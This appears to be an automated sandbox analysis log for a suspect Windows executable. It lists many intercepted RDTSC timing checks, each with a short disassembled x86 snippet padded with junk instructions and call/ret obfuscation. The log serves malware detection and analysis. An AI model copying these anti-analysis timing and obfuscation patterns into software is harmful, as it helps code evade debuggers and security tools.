Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21BB1D second address: 21BB42 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F6034D241D9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21BE19 second address: 21BE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21BE1D second address: 21BE31 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6034D241C6h 0x00000008 ja 00007F6034D241C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 210B94 second address: 210B98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1F4FB2 second address: 1F4FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21C998 second address: 21C99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21CB15 second address: 21CB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21CB19 second address: 21CB42 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6035561AD6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F6035561AE8h 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21CE14 second address: 21CE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21CE18 second address: 21CE2A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6035561AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F6035561AD6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21F230 second address: 21F234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21F234 second address: 21F248 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6035561AD6h 0x00000008 jnp 00007F6035561AD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22491F second address: 224924 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 224DBD second address: 224DC7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6035561AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 224EE0 second address: 224F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c jl 00007F6034D241CCh 0x00000012 jg 00007F6034D241C6h 0x00000018 pop edi 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jc 00007F6034D241CEh 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 224F06 second address: 224F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [eax] 0x00000007 jne 00007F6035561AE9h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 224F2F second address: 224F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2237FC second address: 223800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 223800 second address: 223806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 223806 second address: 22380D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 223F42 second address: 223F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2278D3 second address: 2278D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2278D7 second address: 2278E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F6034D241CEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1E5EEA second address: 1E5EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22AD2A second address: 22AD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22AD32 second address: 22AD38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22AD38 second address: 22AD42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22DF77 second address: 22DF91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6035561AE6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22E282 second address: 22E286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22E286 second address: 22E2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6035561AE7h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22E2A6 second address: 22E2B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F6034D241C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22E3C1 second address: 22E3F8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6035561AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6035561AE2h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6035561AE6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22E3F8 second address: 22E405 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6034D241C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22E674 second address: 22E688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6035561ADFh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22E688 second address: 22E68E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22EBBD second address: 22EBD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6035561ADCh 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22EC74 second address: 22EC78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22EC78 second address: 22ECA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], ebx 0x0000000a mov dword ptr [ebp+122D1C9Dh], edx 0x00000010 nop 0x00000011 jbe 00007F6035561AE2h 0x00000017 push eax 0x00000018 jmp 00007F6035561ADAh 0x0000001d pop eax 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22ECA2 second address: 22ECA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22ECA6 second address: 22ECAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22ECAC second address: 22ECB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22F275 second address: 22F2BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6035561AE7h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F6035561AD8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+122D378Eh] 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push ebx 0x00000030 push ecx 0x00000031 pop ecx 0x00000032 pop ebx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22F2BF second address: 22F2C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22F84B second address: 22F850 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 230251 second address: 230257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 231348 second address: 2313AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561ADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F6035561AD8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov di, cx 0x00000027 push 00000000h 0x00000029 add si, 3908h 0x0000002e push 00000000h 0x00000030 xor si, 5A7Ch 0x00000035 cmc 0x00000036 xchg eax, ebx 0x00000037 jp 00007F6035561AEAh 0x0000003d push eax 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2313AF second address: 2313B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 231E72 second address: 231E9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561AE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jo 00007F6035561AD6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 231E9A second address: 231F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F6034D241C8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 movsx edi, ax 0x0000002a mov dword ptr [ebp+122D3007h], eax 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F6034D241C8h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c movzx esi, dx 0x0000004f push 00000000h 0x00000051 sub edi, dword ptr [ebp+122D37D6h] 0x00000057 xchg eax, ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b jc 00007F6034D241C6h 0x00000061 push ecx 0x00000062 pop ecx 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 232A89 second address: 232ADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6035561ADDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F6035561AD8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a jmp 00007F6035561ADEh 0x0000002f jns 00007F6035561AD6h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 233FFD second address: 234007 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6034D241CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 234007 second address: 234074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D2F02h], eax 0x0000000f push 00000000h 0x00000011 xor edi, dword ptr [ebp+122D1C77h] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F6035561AD8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 xchg eax, ebx 0x00000034 pushad 0x00000035 jmp 00007F6035561ADAh 0x0000003a jmp 00007F6035561AE2h 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F6035561AE3h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 234074 second address: 23407A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 234AC1 second address: 234AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 236C7E second address: 236C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 237195 second address: 23719A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 23719A second address: 2371A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6034D241C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2381F5 second address: 238263 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F6035561AD8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 push 00000000h 0x00000024 jmp 00007F6035561AE8h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F6035561AD8h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 mov ebx, dword ptr [ebp+122D3712h] 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push edi 0x00000051 pop edi 0x00000052 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 238263 second address: 238271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2393E5 second address: 239480 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561ADDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c stc 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov ebx, dword ptr [ebp+122D38E2h] 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push edi 0x00000024 call 00007F6035561AD8h 0x00000029 pop edi 0x0000002a mov dword ptr [esp+04h], edi 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc edi 0x00000037 push edi 0x00000038 ret 0x00000039 pop edi 0x0000003a ret 0x0000003b mov edi, dword ptr [ebp+122D38EEh] 0x00000041 mov eax, dword ptr [ebp+122D1365h] 0x00000047 jmp 00007F6035561AE8h 0x0000004c push FFFFFFFFh 0x0000004e push 00000000h 0x00000050 push esi 0x00000051 call 00007F6035561AD8h 0x00000056 pop esi 0x00000057 mov dword ptr [esp+04h], esi 0x0000005b add dword ptr [esp+04h], 00000014h 0x00000063 inc esi 0x00000064 push esi 0x00000065 ret 0x00000066 pop esi 0x00000067 ret 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F6035561ADAh 0x00000070 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 23B10F second address: 23B115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 23A344 second address: 23A348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 23B115 second address: 23B119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 23D383 second address: 23D389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 23C2FD second address: 23C319 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 23E470 second address: 23E475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 23F35D second address: 23F361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 23F421 second address: 23F425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 23E5D4 second address: 23E65E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F6034D241C8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 stc 0x00000024 push dword ptr fs:[00000000h] 0x0000002b jbe 00007F6034D241CBh 0x00000031 xor edi, 55C74F81h 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007F6034D241C8h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 0000001Bh 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 mov dword ptr [ebp+122D3393h], edi 0x0000005e mov eax, dword ptr [ebp+122D0895h] 0x00000064 mov dword ptr [ebp+1246AAEEh], esi 0x0000006a push FFFFFFFFh 0x0000006c push eax 0x0000006d push ecx 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 23E65E second address: 23E662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 240470 second address: 240476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 24051F second address: 240529 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6035561AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2413E1 second address: 2413E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2433BF second address: 243402 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6035561ADCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+124465ABh], edi 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D2F0Ah], eax 0x0000001b push 00000000h 0x0000001d or bx, A2BFh 0x00000022 xchg eax, esi 0x00000023 jmp 00007F6035561ADAh 0x00000028 push eax 0x00000029 push edi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F6035561ADCh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 23F569 second address: 23F57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6034D241C6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push esi 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
